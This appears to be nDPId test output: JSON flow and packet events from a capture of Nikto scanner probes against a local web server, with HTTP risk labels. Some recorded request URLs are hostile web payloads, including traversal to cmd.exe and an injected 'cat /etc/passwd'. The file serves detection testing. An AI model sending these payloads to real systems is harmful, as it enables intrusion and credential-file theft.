-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":522,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":522,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277513,"flow_last_seen":1576420277513,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277513,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50606,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":522,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":522,"flow_packet_id":1,"flow_last_seen":1576420277513,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277513,"pkt":"AAAAAAAAAAAAAAAACABFAAC9L\/9AAEAGDDp\/AAABfwAAAcWuH5CdEhcgbNGBkoAYAED+sQAAAQEICp1m\/jGdZv4xR0VUIC93LWFnb3JhLyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMDE4MykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":522,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":522,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277513,"flow_last_seen":1576420277513,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277513,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50606,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/w-agora\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000183)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":523,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":523,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277515,"flow_last_seen":1576420277515,"flow_idle_time":7440000,"flow_min_l4_payload_len":168,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":168,"midstream":1,"thread_ts_msec":1576420277515,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50608,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00702{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":523,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":523,"flow_packet_id":1,"flow_last_seen":1576420277515,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":234,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":234,"pkt_l4_len":200,"thread_ts_msec":1576420277515,"pkt":"AAAAAAAAAAAAAAAACABFAADcMJVAAEAGC4V\/AAABfwAAAcWwH5AAUQhya1uvboAYAED+0AAAAQEICp1m\/jOdZv4zR0VUIC9jZ2ktbG9jYWwvY2dpZW1haWwtMS42L2NnaWNzbz9xdWVyeT1BQUEgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDAzNDQpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01087{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":523,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":523,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277515,"flow_last_seen":1576420277515,"flow_idle_time":7440000,"flow_min_l4_payload_len":168,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":168,"midstream":1,"thread_ts_msec":1576420277515,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50608,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": 
{"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-local\/cgiemail-1.6\/cgicso?query=AAA","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000344)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":524,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":524,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277516,"flow_last_seen":1576420277516,"flow_idle_time":7440000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"thread_ts_msec":1576420277516,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50610,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00686{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":524,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":524,"flow_packet_id":1,"flow_last_seen":1576420277516,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":220,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":220,"pkt_l4_len":186,"thread_ts_msec":1576420277516,"pkt":"AAAAAAAAAAAAAAAACABFAADO6rNAAEAGUXR\/AAABfwAAAcWyH5BduNJTZLl5JoAYAED+wgAAAQEICp1m\/jSdZv40R0VUIC9zZXJ2bGV0L1NjaGVkdWxlclRyYW5zZmVyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDAzNDUpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} 
-01072{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":524,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":524,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277516,"flow_last_seen":1576420277516,"flow_idle_time":7440000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"thread_ts_msec":1576420277516,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50610,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/servlet\/SchedulerTransfer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000345)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":525,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":525,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277518,"flow_last_seen":1576420277518,"flow_idle_time":7440000,"flow_min_l4_payload_len":162,"flow_max_l4_payload_len":162,"flow_tot_l4_payload_len":162,"flow_avg_l4_payload_len":162,"midstream":1,"thread_ts_msec":1576420277518,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50612,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00694{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":525,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":525,"flow_packet_id":1,"flow_last_seen":1576420277518,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":228,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":228,"pkt_l4_len":194,"thread_ts_msec":1576420277518,"pkt":"AAAAAAAAAAAAAAAACABFAADWgsZAAEAGuVl\/AAABfwAAAcW0H5A6eLoo9CriDoAYAED+ygAAAQEICp1m\/jWdZv41R0VUIC9zZXJ2bGV0L3N1bmV4YW1wbGVzLkJCb2FyZFNlcnZsZXQgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMDM0NikNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01080{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":525,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":525,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277518,"flow_last_seen":1576420277518,"flow_idle_time":7440000,"flow_min_l4_payload_len":162,"flow_max_l4_payload_len":162,"flow_tot_l4_payload_len":162,"flow_avg_l4_payload_len":162,"midstream":1,"thread_ts_msec":1576420277518,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50612,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/servlet\/sunexamples.BBoardServlet","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000346)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":526,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":526,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277519,"flow_last_seen":1576420277519,"flow_idle_time":7440000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":155,"midstream":1,"thread_ts_msec":1576420277519,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50614,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00687{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":526,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":526,"flow_packet_id":1,"flow_last_seen":1576420277519,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":221,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":221,"pkt_l4_len":187,"thread_ts_msec":1576420277519,"pkt":"AAAAAAAAAAAAAAAACABFAADPVxFAAEAG5RV\/AAABfwAAAcW2H5BSXG\/tRc4oyoAYAED+wwAAAQEICp1m\/jedZv43R0VUIC9zZXJ2bGV0cy9TY2hlZHVsZXJUcmFuc2ZlciBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMDM0NykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01073{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":526,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":526,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277519,"flow_last_seen":1576420277519,"flow_idle_time":7440000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":155,"midstream":1,"thread_ts_msec":1576420277519,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50614,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": 
{"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/servlets\/SchedulerTransfer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000347)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":527,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":527,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277520,"flow_last_seen":1576420277520,"flow_idle_time":7440000,"flow_min_l4_payload_len":152,"flow_max_l4_payload_len":152,"flow_tot_l4_payload_len":152,"flow_avg_l4_payload_len":152,"midstream":1,"thread_ts_msec":1576420277520,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50616,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00682{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":527,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":527,"flow_packet_id":1,"flow_last_seen":1576420277520,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"thread_ts_msec":1576420277520,"pkt":"AAAAAAAAAAAAAAAACABFAADMFYpAAEAGJqB\/AAABfwAAAcW4H5AzUC1t6XmH4oAYAED+wAAAAQEICp1m\/jidZv44R0VUIC9wZXJsLy1lJTIwcHJpbnQlMjBIZWxsbyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAwMzUyKQ0KDQo="} 
-01070{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":527,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":527,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277520,"flow_last_seen":1576420277520,"flow_idle_time":7440000,"flow_min_l4_payload_len":152,"flow_max_l4_payload_len":152,"flow_tot_l4_payload_len":152,"flow_avg_l4_payload_len":152,"midstream":1,"thread_ts_msec":1576420277520,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50616,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/perl\/-e%20print%20Hello","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000352)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":528,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":528,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277522,"flow_last_seen":1576420277522,"flow_idle_time":7440000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":164,"midstream":1,"thread_ts_msec":1576420277522,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50618,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00699{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":528,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":528,"flow_packet_id":1,"flow_last_seen":1576420277522,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":230,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":230,"pkt_l4_len":196,"thread_ts_msec":1576420277522,"pkt":"AAAAAAAAAAAAAAAACABFAADYfsdAAEAGvVZ\/AAABfwAAAcW6H5DDSkYijR1boIAYAED+zAAAAQEICp1m\/jqdZv46R0VUIC9jL3dpbm50L3N5c3RlbTMyL2NtZC5leGU\/L2MrZGlyKy9PRyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMDQ5MSkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01086{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":528,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":528,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277522,"flow_last_seen":1576420277522,"flow_idle_time":7440000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":164,"midstream":1,"thread_ts_msec":1576420277522,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50618,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/c\/winnt\/system32\/cmd.exe?\/c+dir+\/OG","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000491)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":529,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":529,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277525,"flow_last_seen":1576420277525,"flow_idle_time":7440000,"flow_min_l4_payload_len":200,"flow_max_l4_payload_len":200,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":200,"midstream":1,"thread_ts_msec":1576420277525,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50620,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00746{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":529,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":529,"flow_packet_id":1,"flow_last_seen":1576420277525,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":266,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":266,"pkt_l4_len":232,"thread_ts_msec":1576420277525,"pkt":"AAAAAAAAAAAAAAAACABFAAD8VQBAAEAG5vl\/AAABfwAAAcW8H5BNImwcgJPNrYAYAED+8AAAAQEICp1m\/j2dZv48R0VUIC9tc2FkYy8uLiUyNTVjLi4vLi4lMjU1Yy4uLy4uJTI1NWMuLi93aW5udC9zeXN0ZW0zMi9jbWQuZXhlPy9jK2RpcitjOiU1YyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAwNDk0KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01124{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":529,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":529,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277525,"flow_last_seen":1576420277525,"flow_idle_time":7440000,"flow_min_l4_payload_len":200,"flow_max_l4_payload_len":200,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":200,"midstream":1,"thread_ts_msec":1576420277525,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50620,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard 
Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/msadc\/..%255c..\/..%255c..\/..%255c..\/winnt\/system32\/cmd.exe?\/c+dir+c:%5c","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000494)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":530,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":530,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277526,"flow_last_seen":1576420277526,"flow_idle_time":7440000,"flow_min_l4_payload_len":200,"flow_max_l4_payload_len":200,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":200,"midstream":1,"thread_ts_msec":1576420277526,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50622,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00746{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":530,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":530,"flow_packet_id":1,"flow_last_seen":1576420277526,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":266,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":266,"pkt_l4_len":232,"thread_ts_msec":1576420277526,"pkt":"AAAAAAAAAAAAAAAACABFAAD8wPBAAEAGewl\/AAABfwAAAcW+H5C+lvgMjxfu9IAYAED+8AAAAQEICp1m\/j6dZv4+R0VUIC9tc2FkYy8uLiUyNTVjLi4vLi4lMjU1Yy4uLy4uJTI1NWMuLi93aW5udC9zeXN0ZW0zMi9jbWQuZXhlPy9jK2RpcitjOiU1YyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMDQ5NSkNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} 
-01124{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":530,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":530,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277526,"flow_last_seen":1576420277526,"flow_idle_time":7440000,"flow_min_l4_payload_len":200,"flow_max_l4_payload_len":200,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":200,"midstream":1,"thread_ts_msec":1576420277526,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50622,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/msadc\/..%255c..\/..%255c..\/..%255c..\/winnt\/system32\/cmd.exe?\/c+dir+c:%5c","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000495)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":531,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":531,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277527,"flow_last_seen":1576420277527,"flow_idle_time":7440000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"thread_ts_msec":1576420277527,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50624,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00687{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":531,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":531,"flow_packet_id":1,"flow_last_seen":1576420277527,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":220,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":220,"pkt_l4_len":186,"thread_ts_msec":1576420277527,"pkt":"AAAAAAAAAAAAAAAACABFAADOGxtAAEAGIQ1\/AAABfwAAAcXAH5ABqiP992RjDoAYAED+wgAAAQEICp1m\/j+dZv4\/R0VUIC9tc2FkYy9zYW1wbGVzL2FkY3Rlc3QuYXNwIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAwNDk2KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01073{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":531,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":531,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277527,"flow_last_seen":1576420277527,"flow_idle_time":7440000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"thread_ts_msec":1576420277527,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50624,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/msadc\/samples\/adctest.asp","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000496)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":532,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":532,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277528,"flow_last_seen":1576420277528,"flow_idle_time":7440000,"flow_min_l4_payload_len":169,"flow_max_l4_payload_len":169,"flow_tot_l4_payload_len":169,"flow_avg_l4_payload_len":169,"midstream":1,"thread_ts_msec":1576420277528,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50626,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00707{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":532,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":532,"flow_packet_id":1,"flow_last_seen":1576420277528,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":235,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":235,"pkt_l4_len":201,"thread_ts_msec":1576420277528,"pkt":"AAAAAAAAAAAAAAAACABFAADdW\/pAAEAG4B5\/AAABfwAAAcXCH5D1lWMf6eFgloAYAED+0QAAAQEICp1m\/kCdZv5AR0VUIC9hdGhlbmFyZWcucGhwP3Bhc3M9JTIwO2NhdCUyMC9ldGMvcGFzc3dkIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDA2NjcpDQoNCg=="} 